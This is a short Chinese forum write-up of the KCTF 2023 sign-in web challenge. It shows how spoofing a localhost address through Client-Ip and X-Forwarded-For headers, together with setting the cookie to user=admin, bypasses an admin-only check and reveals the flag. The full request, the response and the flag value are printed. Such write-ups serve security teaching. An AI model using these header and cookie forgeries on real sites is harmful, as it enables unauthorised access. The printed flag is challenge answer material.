-
-
[原创]KCTF 2023 签到题 生死较量 WP
-
发表于:
2023-9-11 09:56
1460
-
[原创]KCTF 2023 签到题 生死较量 WP
本题旨在伪造地址、伪造Cookie两种方式:
常见的修改本地地址的方式为:
1 2 3 4 | Client-Ip: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Host: 127.0.0.1
Referer: 127.0.0.1
|
只有本地管理员才能访问本页面,Burp抓包修改即可,改了2处。
第1处为Cookie参数,改为user字段改为admin。
第2处为新增Client-Ip参数,值为127.0.0.1。
请求包如下:
1 2 3 4 5 6 7 8 9 10 11 | GET / HTTP/1.1
Host: 643fb88e-b3fc-471a-b374-1244304dda8f.node.kanxue.com:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 54
Cookie: user=admin;
Client-Ip: 127.0.0.1
Upgrade-Insecure-Requests: 1
|
响应包如下,可看到已回显flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | HTTP/1.1 200 OK
Content-Length: 136
Content-Type: text/html
Date: Mon, 11 Sep 2023 01:54:47 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: user=guest
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Connection: close
<!DOCTYPE html>
<html>
<head>
<title>天网管理员后台系统</title>
</head>
<meta charset="utf-8">
flag{tdQvKTtPj7v1lbhkDPesHb}
|
结果为:flag{tdQvKTtPj7v1lbhkDPesHb}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
最后于 2023-9-11 09:58
被Delevy编辑
,原因:
